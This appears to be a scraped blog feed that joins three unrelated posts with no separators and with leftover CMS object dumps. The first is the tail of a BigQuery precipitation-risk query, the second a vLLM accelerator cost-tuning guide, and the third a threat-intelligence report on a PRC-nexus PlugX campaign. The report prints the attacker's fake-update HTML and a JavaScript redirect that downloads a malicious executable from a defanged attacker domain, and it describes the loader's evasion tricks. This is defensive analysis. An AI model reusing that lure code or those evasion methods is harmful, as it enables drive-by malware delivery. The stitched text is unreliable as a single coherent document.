precipitation values.rn– Applies the UDF to the calculated statistics for each return period.rn– This assumes they are the same function.rn|> CROSS JOIN ReturnPeriods rprn|> EXTENDrn CalculateReturnPeriod(rp.years, avg_yearly_max_1day_precip, stddev_yearly_max_1day_precip) AS est_max_1day_preciprn|> DROP avg_yearly_max_1day_precip, stddev_yearly_max_1day_preciprn– Step 10: Pivot the data to create columns for each epoch and return period.rn– The first PIVOT transforms rows for ‘e1’ and ‘e2’ into columns for direct comparison.rn|> PIVOT (ANY_VALUE(est_max_1day_precip) AS est_max_1day_precip FOR epoch IN (‘e1’, ‘e2’))rn– The second PIVOT transforms rows for each return period (10, 25, etc.) into columns.rn|> PIVOT (ANY_VALUE(est_max_1day_precip_e1) AS e1, ANY_VALUE(est_max_1day_precip_e2) AS e2 FOR years IN (10, 25, 50, 100, 500))rn– Step 11: Re-attach county names and geometries for the final output.rn|> LEFT JOIN Counties ON county_id = Counties.idrn– Step 12: Calculate the final difference between the two epochs.rn– This creates the delta values that show the change in precipitation magnitude for each return period.rn|> SELECTrncounty,rnCounties.geometry,rne2_10 – e1_10 AS est_10yr_max_1day_precip_delta,rne2_25 – e1_25 AS est_25yr_max_1day_precip_delta,rne2_50 – e1_50 AS est_50yr_max_1day_precip_delta,rne2_100 – e1_100 AS est_100yr_max_1day_precip_delta,rne2_500 – e1_500 AS est_500yr_max_1day_precip_deltarn|> ORDER BY county”), (‘language’, ”), (‘caption’, <wagtail.rich_text.RichText object at 0x3ebcfc2a2ca0>)])]>
To provide quick results as a demonstration, the example query above filters for five populated counties; running the computation for all of Germany would take much longer. When running the analysis for many more geometries (areas of interest), you can break the analysis into two parts:
Calculate the historical time series of maximum daily precipitation for each county in Germany from 1980-2024 and save the resulting table.
Use these results to calculate and compare precipitation return periods for two distinct timeframes.
With the analysis complete, the results can be immediately rendered using the new Visualization feature in BigQuery Studio. This allows the insurance provider to:
Pinpoint high-risk zones: Visually identify clusters of counties with increasing extreme precipitation, for proactive risk mitigation and to optimize policy pricing.
Communicate insights: Share interactive maps with stakeholders, making complex risk assessments understandable at a glance.
Inform strategic decisions: This type of analysis is not limited to insurance. For example, a consumer packaged goods (CPG) company could use these insights to optimize warehouse and distribution center locations, situating them in areas with more stable climate conditions.
Running BigQuery analysis for changing extreme precipitation events in Germany and interactively exploring the results with the new Map visualization
This combination of Earth Engine, BigQuery, and integrated visualization helps businesses move beyond reactive measures, enabling data-driven foresight in a rapidly changing world.
The future of geospatial analysis is here
With the general availability of Earth Engine in BigQuery and the preview of map visualization, we’re helping data professionals across industries to unlock richer, more actionable insights from their geospatial data. From understanding climate risk for buildings in flood-prone areas to optimizing enterprise planning and supply chains, these tools are designed to power operational decision making, helping your business thrive in an increasingly data-driven landscape.
We are continuously working to expand the utility and accessibility of this new set of capabilities, including:
Growing catalog of datasets: Expect more datasets for both Earth Engine and BigQuery Sharing, allowing you to leverage analysis-ready datasets for individual or combined use with custom datasets.
Intelligent geospatial assistance: We envision a future where advanced AI and code generation capabilities will further streamline geospatial workflows. Stay tuned for more on this later this year!
Additional contributors include Hossein Sarshar, Ashish Narasimham, and Chenyang Li.
Large Language Models (LLMs) are revolutionizing how we interact with technology, but serving these powerful models efficiently can be a challenge. vLLM has rapidly become the primary choice for serving open source large language models at scale, but using vLLM is not a silver bullet. Teams that are serving LLMs for downstream applications have stringent latency and throughput requirements that necessitate a thorough analysis of which accelerator to run on and what configuration offers the best possible performance.
This guide provides a bottoms-up approach to determining the best accelerator for your use case and optimizing your vLLM’s configuration to achieve the best and most cost effective results possible.
Note: This guide assumes that you are familiar with xPUs, vLLM, and the underlying features that make it such an effective serving framework.
Choosing the right accelerator can feel like an intimidating process because each inference use case is unique. There is no a priori ideal set up from a cost/performance perspective; we can’t say model X should always be run on accelerator Y.
The following considerations need to be taken into account to best determine how to proceed:
What model are you using?
Our example model is google/gemma-3-27b-it. This is a 27-billion parameter instruction-tuned model from Google’s Gemma 3 family.
What is the precision of the model you’re using?
We will use bfloat16 (BF16).
Note: Model precision determines the number of bytes used to store each model weight. Common options are float32 (4 bytes), float16 (2 bytes), and bfloat16 (2 bytes). Many models are now also available in quantized formats like 8-bit, 4-bit (e.g., GPTQ, AWQ), or even lower. Lower precision reduces memory requirements and can increase speed, but may come with a slight trade-off in accuracy.
Workload characteristics: How many requests/second are you expecting?
We are targeting support for 100 requests/second.
What is the average sequence length per request?
Input Length: 1500 tokens
Output Length: 200 tokens
The total sequence length per request is therefore 1500 + 200 = 1700 tokens on average.
What is the maximum total sequence length we will need to be able to handle?
Let’s say in this case it is 2000 total tokens
What is the GPU Utilization you’ll be using?
The gpu_memory_utilization parameter in vLLM controls how much of the xPU’s VRAM is pre-allocated for the KV cache (given the allocated memory for the model weights). By default, this is 90% in vLLM, but we generally want to set this as high as possible to optimize performance without causing OOM issues – which is how our auto_tune.sh script works (as described in the “Benchmarking, Tuning and Finalizing Your vLLM Configuration” section of this post).
What is your prefix cache rate?
This will be determined from application logs, but we’ll estimate 50% for our calculations.
Note: Prefix caching is a powerful vLLM optimization that reuses the computed KV cache for shared prefixes across different requests. For example, if many requests share the same lengthy system prompt, the KV cache for that prompt is calculated once and shared, saving significant computation and memory. The hit rate is highly application-specific. You can estimate it by analyzing your request logs for common instruction patterns or system prompts.
What is your latency requirement?
The end-to-end latency from request to final token should not exceed 10 seconds (P99 E2E). This is our primary performance constraint.
Selecting Accelerators (xPU)
We live in a world of resource scarcity! What does this mean for your use case? It means that of course you could probably get the best possible latency and throughput by using the most up to date hardware – but as an engineer it makes no sense to do this when you can achieve your requirements at a better price/performance point.
Identifying Candidate Accelerators
We can refer to our Accelerator-Optimized Machine Family of Google Cloud Instances to determine which accelerator-optimized instances are viable candidates.
We can refer to our Cloud TPU offerings to determine which TPUs are viable candidates.
The following are examples of accelerators that can be used for our workloads, as we will see in the “Calculate Memory Requirements” section.
The following options have different Tensor Parallelism (TP) configurations required depending on the total VRAM. Please see the next section for an explanation of Tensor Parallelism.
Accelerator-optimized Options
g2-standard-48
Provides 4 accelerators with 96 GB of GDDR6
TP = 4
a2-ultragpu-1g
Provides 1 accelerator with 80 GB of HBM
TP = 1
a3-highgpu-1g
Provides 1 accelerator with 80GB of HBM
TP = 1
TPU Options
TPU v5e (16 GB of HBM per chip)
v5litepod-8 provides 8 v5e TPU chips with 128GB of total HBM
TP = 8
TPU v6e aka Trillium (32 GB of HBM per chip)
v6e-4 provides 4 v6e TPU chips with 128GB of total HBM
TP = 4
Calculate Memory Requirements
We must estimate the total minimum VRAM needed. This will tell us if the model can fit on a single accelerator or if we need to use parallelism. Memory utilization can be broken down into two main components: static memory from our model weights, activations, and overhead plus the KV Cache memory.
model_weight is equal to the number of parameters x a constant depending on parameter data type/precision
non_torch_memory is a buffer for memory overhead (estimated ~1GB)
pytorch_activation_peak_memory is the memory required for intermediate activations
kv_cache_memory_per_batch is the memory required for the KV cache per batch
batch_size is the number of sequences that will be processed simultaneously by the engine
A batch size of one is not a realistic value, but it does provide us with the minimum VRAM we will need for the engine to get off the ground. You can vary this parameter in the calculator to see just how much VRAM we will need to support our larger batch sizes of 128 – 512 sequences.
In our case, we find that we need a minimum of ~57 GB of VRAM to run gemma-3-27b-it on vLLM for our specific workload.
Is Tensor Parallelism Required?
In this case, the answer is that parallelism is not necessarily required, but we could and should consider our options from a price/performance perspective. Why does it matter?
Very quickly – what is Tensor Parallelism? At the highest level, Tensor Parallelism is a method of breaking apart a large model across multiple accelerators (xPU) so that the model can actually fit on the hardware we need. See here for more information.
vLLM supports Tensor Parallelism (TP). With tensor parallelism, accelerators must constantly communicate and synchronize with each other over the network for the model to work. This inter-accelerator communication can add overhead, which has a negative impact on latency. This means we have a tradeoff between cost and latency in our case.
Note: Tensor parallelism is required for TPU’s because of the particular size of this model. v5e and v6e have 16 GB and 32 GB of HBM respectively and mentioned above, so multiple chips are required to support the model size. In this guide, v6e-4 does pay a slight performance penalty for this communication overhead while a single accelerator instance would not.
Benchmarking, Tuning and Finalizing Your vLLM Configuration
Now that you have your short list of accelerator candidates, it is time to see the best level of performance we can across each potential setup. We will only overview an anonymized accelerator-optimized instance and Trillium (v6e) benchmarking & tuning in this section – but the process would be nearly identical for the other accelerators:
Launch, SSH, Update VMs
Pull vLLM Docker Image
Update and Launch Auto Tune Script
Analyze Results
Accelerator-optimized Machine Type
In your project, open the Cloud Shell and enter the following command to launch your chosen instance and its corresponding accelerator and accelerator count. Be sure to update your project ID accordingly and select a zone that supports your machine type for which you have quota.
Now that we’re in our running instance, we can go ahead and pull the latest vLLM Docker image and then run it interactively. A final detail — if we are using a gated model (and we are in this demo) we will need to provide our HF_TOKEN in the container:
In our running container, we can now find a file called vllm-workspace/benchmarks/auto_tune/auto_tune.sh that we need to update with the information we determined above to tune our vLLM configuration for the best possible throughput and latency.
code_block
<ListValue: [StructValue([(‘code’, ‘# navigate to correct directoryrncd benchmarks/auto_tunernrn# update the auto_tune.sh script – user your preferred script editorrnnano auto_tune.sh’), (‘language’, ”), (‘caption’, <wagtail.rich_text.RichText object at 0x3e1d46fdbac0>)])]>
In the auto_tune.sh script, you will need to make the following updates:
Our auto_tune.sh script downloads the required model and attempts to start a vLLM server at the highest possible gpu_utilization (0.98 by default). If a CUDA OOM occurs, we go down 1% until we find a stable configuration.
Troubleshooting Note: In rare cases, a vLLM server may be able to start during the initial gpu_utilization test but then fail due to CUDA OOM at the start of the next benchmark. Alternatively, the initial test may fail and then not spawn a follow up server resulting in what appears to be a hang. If either happens, edit the auto_tune.sh near the very end of the file so that gpu_utilization begins at 0.95 or a lower value rather than beginning at 0.98.
Then, for each permutation of num_seqs_list and num_batched_tokens, a server is spun up and our workload is simulated.
A benchmark is first run with an infinite request rate.
If the resulting P99 E2E Latency is within the MAX_LATENCY_ALLOWED_MS limit, this throughput is considered the maximum for this configuration.
If the latency is too high, the script performs a search by iteratively decreasing the request rate until the latency constraint is met. This finds the highest sustainable throughput for the given parameters and latency requirement.
In our results.txt file at /vllm-workspace/auto-benchmark/$TAG/result.txt, we will find which combination of parameters is most efficient, and then we can take a closer look at that run:
Let’s look at the best-performing result to understand our position:
max_num_seqs: 256, max_num_batched_tokens: 512
These were the settings for the vLLM server during this specific test run.
request_rate: 6
This is the final input from the script’s loop. It means your script determined that sending 6 requests per second was the highest rate this server configuration could handle while keeping latency below 10,000 ms. If it tried 7 req/s, the latency was too high.
e2el: 7612.31
This is the P99 latency that was measured when the server was being hit with 6 req/s. Since 7612.31 is less than 10000, the script accepted this as a successful run.
throughput: 4.17
This is the actual, measured output. Even though you were sending requests at a rate of 6 per second, the server could only successfully process them at a rate of 4.17 per second.
TPU v6e (aka Trillium)
Let’s do the same optimization process for TPU now. You will find that vLLM has a robust ecosystem for supporting TPU-based inference and that there is little difference between how we execute TPU benchmarking and the previously described process.
First we’ll need to launch and configure networking for our TPU instance – in this case we can use Queued Resources. Back in our Cloud Shell, use the following command to deploy a v6e-4 instance. Be sure to select a zone where v6e is available.
<ListValue: [StructValue([(‘code’, ‘# Monitor creationrngcloud compute tpus queued-resources list –zone $ZONE –project $PROJECT’), (‘language’, ”), (‘caption’, <wagtail.rich_text.RichText object at 0x3e1d46fc8fd0>)])]>
Wait for the TPU VM to become active (status will update from PROVISIONING to ACTIVE). This might take some time depending on resource availability in the selected zone.
SSH directly into the instance with the following command:
Again, we will need to install a dependency, provide our HF_TOKEN and update our auto-tune script as we did above with our other machine type.
code_block
<ListValue: [StructValue([(‘code’, ‘# Head to main working directoryrncd benchmarks/auto_tune/rnrn# install required libraryrnapt-get install bcrnrn# Provide HF_TOKENrnexport HF_TOKEN=XXXXXXXXXXXXXXXXXXXXXrnrn# update auto_tune.sh with your preferred script editor and launch auto_tunerrnnano auto_tune.sh’), (‘language’, ”), (‘caption’, <wagtail.rich_text.RichText object at 0x3e1d46fc8b20>)])]>
We will want to make the following updates to the vllm/benchmarks/auto_tune.sh file:
As our auto_tune.sh executes we determine the largest possible gpu_utilization value our server can run on and then cycle through the different num_batched_tokens parameters to determine which is most efficient.
Troubleshooting Note: It can take a longer amount of time to start up a vLLM engine on TPU due to a series of compilation steps that are required. In some cases, this can go longer than 10 minutes – and when that occurs the auto_tune.sh script may kill the process. If this happens, update the start_server() function such that the for loop sleeps for 30 seconds rather than 10 seconds as shown here:
code_block
<ListValue: [StructValue([(‘code’, ‘start_server() {rnrn…rnrn for i in {1..60}; do rn RESPONSE=$(curl -s -X GET “http://0.0.0.0:8004/health” -w “%{http_code}” -o /dev/stdout)rn STATUS_CODE=$(echo “$RESPONSE” | tail -n 1) rn if [[ “$STATUS_CODE” -eq 200 ]]; thenrn server_started=1rn breakrn elsern sleep 10 # UPDATE TO 30 IF VLLM ENGINE START TAKES TOO LONGrn firn donern if (( ! server_started )); thenrn echo “server did not start within 10 minutes. Please check server log at $vllm_log”.rn return 1rn elsern return 0rn firn}’), (‘language’, ”), (‘caption’, <wagtail.rich_text.RichText object at 0x3e1d46fc8a60>)])]>
The outputs are printed as our program executes and we can also find them in log files at $BASE/auto-benchmark/TAG. We can see in these logs that our current configurations are still able to achieve our latency requirements.
Let’s look at the best-performing result to understand our position:
max_num_seqs: 256, max_num_batched_tokens: 512
These were the settings for the vLLM server during this specific test run.
request_rate: 9
This is the final input from the script’s loop. It means your script determined that sending 9 requests per second was the highest rate this server configuration could handle while keeping latency below 10,000 ms. If it tried 10 req/s, the latency was too high.
e2el: 8423.40
This is the P99 latency that was measured when the server was being hit with 9 req/s. Since 8423.40 is less than 10,000, the script accepted this as a successful run.
throughput: 5.63
This is the actual, measured output. Even though you were sending requests at a rate of 9 per second, the server could only successfully process them at a rate of 5.63 per second.
Calculating Performance-Cost Ratio
Now that we have tuned and benchmarked our two primary accelerator candidates, we can bring the data together to make a final, cost-based decision. The goal is to find the most economical configuration that can meet our workload requirement of 100 requests per second while staying under our P99 end-to-end latency limit of 10,000 ms.
We will analyze the cost to meet our 100 req/s target using the best-performing configuration for both the anonymized candidate and the TPU v6e.
Anonymized Accelerator-optimized Candidate
Measured Throughput: The benchmark showed a single vLLM engine achieved a throughput of 4.17 req/s.
Instances Required: To meet our 100 req/s goal, we would need to run multiple instances. The calculation is:
Since we can’t provision a fraction of an instance, we must round up to 24 instances.
Estimated Cost: As of July 2025, the spot price for our anonymized machine type in us-central1 was approximately $2.25 per hour. The total hourly cost for our cluster would be: 24 instances × $2.25/hr = $54.00/hr
Note: We are choosing Spot instance pricing for the simple cost figures, this would not be a typical provisioning pattern for this type of workload.
Google Cloud TPU v6e (v6e-4)
Measured Throughput: The benchmark showed a single v6e-4 vLLM engine achieved a higher throughput of 5.63 req/s.
Instances Required: We perform the same calculation for the TPU cluster:
Again, we must round up to 18 instances to strictly meet the 100 req/s requirement.
Estimated Cost: As of July 2025, the spot price for a v6e-4 queued resource in us-central1 is approximately $0.56 per chip per hour. The total hourly cost for this cluster would be:
18 instances × 4 chips x $0.56/hr = $40.32/hr
Conclusion: The Most Cost-Effective Choice
Let’s summarize our findings in a table to make the comparison clear.
Metric
Anonymized Candidate
TPU (v6e-4)
Throughput per Instance
4.17 req/s
5.63 req/s
Instances Needed (100 req/s)
24
18
Spot Instance Cost Per Hour
$2.25 / hour
$0.56 x 4 chips = $2.24 / hour
Spot Cost Total
$54.00 / hour
$40.32 / hour
Total Monthly Cost (730h)
~ $39,400
~ $29,400
The results are definitive. For this specific workload (serving the gemma-3-27b-it model with long contexts), the v6e-4 configuration is the winner.
Not only does the v6e-4 instance provide higher throughput than our accelerator-optimized instance, but it does so at a reduced cost. This translates to massive savings at higher scales.
Looking at the performance-per-dollar, the advantage is clear:
The v6e-4 configuration delivers almost twice the performance for every dollar spent, making it the superior, efficient choice for deploying this workload.
Final Reminder
This benchmarking and tuning process demonstrates the critical importance of evaluating different hardware options to find the optimal balance of performance and cost for your specific AI workload. We need to keep in mind the following sizing these workloads:
If our workload changed (e.g., input length, output length, prefix-caching percentage, or our requirements) the outcome of this guide may be different – the anonymized candidate could outperform v6e in several scenarios depending on the workload.
If we considered the other possible accelerators mentioned above, we may find a more cost effective approach that meets our requirements.
Finally, we covered a relatively small parameter space in our auto_tune.sh script for this example – perhaps if we searched a larger space we may have found a configuration with even greater cost savings potential.
Additional Resources
The following is a collection of additional resources to help you complete the guide and better understand the concepts described.
In March 2025, Google Threat Intelligence Group (GTIG) identified a complex, multifaceted campaign attributed to the PRC-nexus threat actor UNC6384. The campaign targeted diplomats in Southeast Asia and other entities globally. GTIG assesses this was likely in support of cyber espionage operations aligned with the strategic interests of the People’s Republic of China (PRC).
The campaign hijacks target web traffic, using a captive portal redirect, to deliver a digitally signed downloader that GTIG tracks as STATICPLUGIN. This ultimately led to the in-memory deployment of the backdoor SOGU.SEC (also known as PlugX). This multi-stage attack chain leverages advanced social engineering including valid code signing certificates, an adversary-in-the-middle (AitM) attack, and indirect execution techniques to evade detection.
Google is actively protecting our users and customers from this threat. We sent government-backed attacker alerts to all Gmail and Workspace users impacted by this campaign. We encourage users to enable Enhanced Safe Browsing for Chrome, ensure all devices are fully updated, and enable 2-Step Verification on accounts. Additionally, all identified domains, URLs, and file hashes have been added to the Google Safe Browsing list of unsafe web resources. Google Security Operations (SecOps) has also been updated with relevant intelligence, enabling defenders to hunt for this activity in their environments.
aside_block
<ListValue: [StructValue([(‘title’, ‘Webinar: Defending Against Sophisticated and Evolving PRC-Nexus Espionage Campaigns’), (‘body’, <wagtail.rich_text.RichText object at 0x3ebcfc7c4af0>), (‘btn_text’, ‘Register now’), (‘href’, ‘https://www.brighttalk.com/webcast/7451/651182?utm_source=blog’), (‘image’, None)])]>
Overview
This blog post presents our findings and analysis of this espionage campaign, as well as the evolution of the threat actor’s operational capabilities. We examine how the malware is delivered, how the threat actor utilized social engineering and evasion techniques, and technical aspects of the multi-stage malware payloads.
In this campaign, the malware payloads were disguised as either software or plugin updates and delivered through UNC6384 infrastructure using AitM and social engineering tactics. A high level overview of the attack chain:
The target’s web browser tests if the internet connection is behind a captive portal;
An AitM redirects the browser to a threat actor controlled website;
The first stage malware, STATICPLUGIN, is downloaded;
STATICPLUGIN then retrieves an MSI package from the same website;
Finally, CANONSTAGER is DLL side-loaded and deploys the SOGU.SEC backdoor.
Figure 1: Attack chain diagram
Malware Delivery: Captive Portal Hijack
GTIG discovered evidence of a captive portal hijack being used to deliver malware disguised as an Adobe Plugin update to targeted entities. A captive portal is a network setup that directs users to a specific webpage, usually a login or splash page, before granting internet access. This functionality is intentionally built into all web browsers. The Chrome browser performs an HTTP request to a hardcoded URL (“http://www.gstatic.com/generate_204”) to enable this redirect mechanism.
While “gstatic.com” is a legitimate domain, our investigation uncovered redirect chains from this domain leading to the threat actor’s landing webpage and subsequent malware delivery, indicating an AitM attack. We assess the AitM was facilitated through compromised edge devices on the target networks. However, GTIG did not observe the attack vector used to compromise the edge devices.
Figure 2: Captive portal redirect chain
Fake Plugin Update
After being redirected, the threat actor attempts to deceive the target into believing that a software update is needed, and to download the malware disguised as a “plugin update”. The threat actor used multiple social engineering techniques to form a cohesive and credible update theme.
The landing webpage resembles a legitimate software update site and uses an HTTPS connection with a valid TLS certificate issued by Let’s Encrypt. The use of HTTPS offers several advantages for social engineering and malware delivery. Browser warning messages, such as “Not Secure” and “Your connection is not private”, will not be displayed to the target, and the connection to the website is encrypted, making it more difficult for network-based defenses to inspect and detect the malicious traffic. Additionally, the malware payload is disguised as legitimate software and is digitally signed with a certificate issued by a Certificate Authority.
$ openssl x509 -in mediareleaseupdates.pem -noout -text -fingerprint -sha256
Certificate:
Data:
Version: 3 (0x2)
Serial Number:
05:23:ee:fd:9f:a8:7d:10:b1:91:dc:34:dd:ee:1b:41:49:bd
Signature Algorithm: sha256WithRSAEncryption
Issuer: C=US, O=Let's Encrypt, CN=R10
Validity
Not Before: May 17 16:58:11 2025 GMT
Not After : Aug 15 16:58:10 2025 GMT
Subject: CN=mediareleaseupdates[.]com
sha256 Fingerprint=6D:47:32:12:D0:CB:7A:B3:3A:73:88:07:74:5B:6C:F1:51:A2:B5:C3:31:65:67:74:DF:59:E1:A4:E2:23:04:68
Figure 3: Website TLS certificate
The initial landing page is completely blank with a yellow bar across the top and a button that reads “Install Missing Plugins…”. If this technique successfully deceives the target into believing they need to install additional software, they may be more willing to manually bypass host-based Windows security protections to execute the delivered malicious payload.
Figure 4: Malware landing page
In the background, Javascript code is loaded from a script file named “style3.js” hosted on the same domain as the HTML page. When the target clicks the install button “myFunction”, which is located in the loaded script, is executed.
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<title>Additional plugins are required to display all the media on this page</title>
<script type="text/javascript" src="https[:]//mediareleaseupdates[.]com/style3.js"> </script>
</head>
<body><div id="adobe update" onclick="myFunction()"...
Figure 5: Javascript from AdobePlugins.html
Inside of “myFunction” another image is loaded to display as the background image on the webpage. The browser window location is also set to the URL of an executable, again hosted on the same domain.
function myFunction()
{
var img = new Image();
img.src ="data:image/png;base64,iVBORw0KGgo[cut]
...
document.body.innerHTML = '';
document.body.style.backgroundImage = 'url(' + img.src + ')';
...
window.location.href = "https[:]//mediareleaseupdates[.]com/AdobePlugins.exe";
}
Figure 6: Javascript from style3.js
This triggers the automatic download of “AdobePlugins.exe” and a new background image to be displayed on the webpage. The image shows instructions for how to execute the downloaded binary and bypass potential Windows security protections.
Figure 7: Malware landing page post-download
When the downloaded executable is run, the fake install prompt seen in the above screenshot for “STEP 2” is displayed on screen, along with “Install” and “Cancel” options. However, the SOGU.SEC payload is likely already running on the target device, as neither button triggers any action relevant to the malware.
Malware Analysis
Upon successful delivery to the target Windows system, the malware initiates a multi-stage deployment chain. Each stage layers tactics designed to evade host-based defenses and maintain stealth on the compromised system. Finally, a novel side-loaded DLL, tracked as CANONSTAGER, concludes with in-memory deployment of the SOGU.SEC backdoor, which then establishes communication with the threat actor’s command and control (C2) server.
Digitally Signed Downloader: STATICPLUGIN
The downloaded “AdobePlugins.exe” file is a first stage malware downloader. The file was signed by Chengdu Nuoxin Times Technology Co., Ltd. with a valid certificate issued by GlobalSign. Signed malware has the major advantage of being able to bypass endpoint security protections that typically trust files with valid digital signatures. This gives the malware false legitimacy, making it harder for both users and automated defenses to detect.
The binary was code signed on May 9th, 2025, possibly indicating how long this version of the downloader has been in use. While the signing certificate expired on July 14th, 2025 and is no longer valid, it may be easy for the threat actor to re-sign new versions of STATICPLUGIN with similarly obtained certificates.
Figure 8: Downloader with valid digital signature
STATICPLUGIN implements a custom TForm which is designed to masquerade as a legitimate Microsoft Visual C++ 2013 Redistributables installer. The malware uses the Windows COM Installer object to download another file from “https[:]//mediareleaseupdates[.]com/20250509[.]bmp”. However, the “BMP” file is actually an MSI package containing three files. After installation of these files, CANONSTAGER is executed via DLL side-loading.
Certificate Subscriber — Chengdu Nuoxin Times Technology Co., Ltd
Our investigation found this is not the first suspicious executable signed with a certificate issued to Chengdu Nuoxin Times Technology Co., Ltd. GTIG is currently tracking 25 known malware samples signed by this Subscriber that are in use by multiple PRC-nexus activity clusters. Many examples of these signed binaries are available in VirusTotal.
GTIG has previously investigated two additional campaigns using malware signed by this entity. While GTIG does not attribute these other campaigns to UNC6384, they have multiple similarities and TTP overlaps with this UNC6384 campaign, in addition to using the same code signing certificates.
Delivery through web-based redirects
Downloader first stage, sometimes packaged in an archive.
In-memory droppers and memory-only backdoor payloads
Masquerading as legitimate applications or updates
Targeting in Southeast Asia
It remains an open question how the threat actors are obtaining these certificates. The Subscriber organization may be a victim with compromised code signing material. However, they may also be a willing participant or front company facilitating cyber espionage operations. Malware samples signed by Chengdu Nuoxin Times Technology Co., Ltd date back to at least January 2023. GTIG is continuing to monitor the connection between this entity and PRC-nexus cyber operations.
Malicious Launcher: CANONSTAGER
Once CANONSTAGER is executed, its ultimate purpose is to surreptitiously execute the encrypted payload, a variant of SOGU tracked as SOGU.SEC. CANONSTAGER implements a control flow obfuscation technique using custom API hashing and Thread Local Storage (TLS). The launcher also abuses legitimate Windows features such as window procedures, message queues, and callback functions to execute the final payload.
API Hashing and Thread Local Storage
Thread Local Storage (TLS) is intended to provide each thread in a multi-threaded application its own private data storage. CANONSTAGER uses the TLS array data structure to store function addresses resolved by its custom API hashing algorithm. The function addresses are later called throughout the binary from offsets into the TLS array.
In short, the API hashing hides which Windows APIs are being used, while the TLS array provides a stealthy location to store the resolved function addresses. Use of the TLS array for this purpose is unconventional. Storing function addresses here may be overlooked by analysts or security tooling scrutinizing more common data storage locations.
Below is an example of CANONSTAGER resolving and storing the GetCurrentDirectoryWfunction address.
Resolve the GetCurrentDirectoryW hash (0x6501CBE1)
Get the location of the TLS array from the Thread Information Block (TIB)
Move the resolved function address into offset 0x8 of the TLS array
Figure 9: Example of storing function addresses in TLS array
Indirect Code Execution
CANONSTAGER hides its launcher code in a custom window procedure and triggers its execution indirectly using the Windows message queue. Using these legitimate Windows features lowers the likelihood of security tools detecting the malware and raising alerts. It also obscures the malware’s control flow by “hiding” its code inside of the window procedure and triggering execution asynchronously.
Enters a message loop to receive and dispatch messages to the created window;
Creates a new thread to decrypt “cnmplog.dat” as SOGU.SEC when the window receives the WM_SHOWWINDOW message; then
Executes SOGU.SEC in-memory with an EnumSystemGeoID callback.
Figure 10: Overview of CANONSTAGER execution using Windows message queue
Window Procedure
On a Windows system, every window class has an associated window procedure. The procedure allows programmers to define a custom function to process messages sent to the specified window class.
CANONSTAGER creates an Overlapped Window with a registered WNDCLASS structure. The structure contains a callback function to the programmer-defined window procedure for processing messages. Additionally, the window is created with a height and width of zero to remain hidden on the screen.
Inside the window procedure, there is a check for message type 0x0018 (WM_SHOWWINDOW). When a message of this type is received, a new thread is created with a function that decrypts and launches the SOGU.SEC payload. For any message type other than 0x0018 (or 0x2 to ExitProcess), the window procedure calls the default handler (DefWindowProc), ignoring the message.
Message Queue
Windows applications use Message Queues for asynchronous communication. Both user applications and the Windows system can post messages to Message Queues. When a message is posted to an application window, the system calls the associated window procedure to process the message.
In order to trigger the malicious window procedure, CANONSTAGER uses the ShowWindow function to send a WM_SHOWWINDOW (0x0018) message to its newly created window via the Message Queue. Since the system, or other applications, may also post messages to the CANONSTAGER’s window, a standard Windows message loop is entered. This allows all posted messages to be sent, including the intended WM_SHOWWINDOW message.
GetMessageW – retrieve all messages in the thread’s message queue.
TranslateMessage – Convert message from a “virtual-key” to a “character message”.
DispatchMessage – Delivers the message to the specific function (WindowProc) that handles messages for the window targeted by that message.
Loop back to 1, until all messages are dispatched.
Deploying SOGU.SEC
After the correct message type is received by the window procedure, CANONSTAGER moves on to deploying its SOGU.SEC payload with the following steps:
Read the encrypted “cnmplog.dat” file, packaged in the downloaded MSI;
Decrypt the file with a hardcoded 16-byte RC4 key;
Execute the decrypted payload using an EnumSystemsGeoID callback function.
Figure 11: Callback function executing SOGU.SEC
UNC6384 has previously used both payload encryption and callback functions to deploy SOGU.SEC. These techniques are used to hide malicious code, evade detection, obfuscate control flow, and blend in with normal system activity. Additionally, all of these steps are done in-memory, avoiding endpoint file-based detections.
The Backdoor: SOGU.SEC
SOGU.SEC is a distinct variant of SOGU and is commonly deployed by UNC6384 in cyber espionage activity. This is a sophisticated, and heavily obfuscated, malware backdoor with a wide range of capabilities. It can collect system information, upload and download files from a C2, and execute a remote command shell. In this campaign, SOGU.SEC was observed communicating directly with the C2 IP address “166.88.2[.]90” using HTTPS.
Attribution
GTIG attributes this campaign to UNC6384, a PRC-nexus cyber espionage group believed to be associated with the PRC-nexus threat actor TEMP.Hex (also known as Mustang Panda). Our attribution is based on similarities in tooling, TPPs, targeting, and overlaps in C2 infrastructure. UNC6384 and TEMP.Hex are both observed to target government sectors, primarily in Southeast Asia, in alignment with PRC strategic interests. Both groups have also been observed to deliver SOGU.SEC malware from DLL side-loaded malware launchers and have used the same C2 infrastructure.
Conclusion
This campaign is a clear example of the continued evolution of UNC6384’s operational capabilities and highlights the sophistication of PRC-nexus threat actors. The use of advanced techniques such as AitM combined with valid code signing and layered social engineering demonstrates this threat actor’s capabilities. This activity follows a broader trend GTIG has observed of PRC-nexus threat actors increasingly employingstealthy tactics to avoid detection.
GTIG actively monitors ongoing threats from actors like UNC6384 to protect users and customers. As part of this effort, Google continuously updates its protections and has taken specific action against this campaign.
Acknowledgment
A special thanks to Jon Daniels for your contributions.
Appendix: Indicators of Compromise
A Google Threat Intelligence (GTI) collection of related IOCs is available to registered users.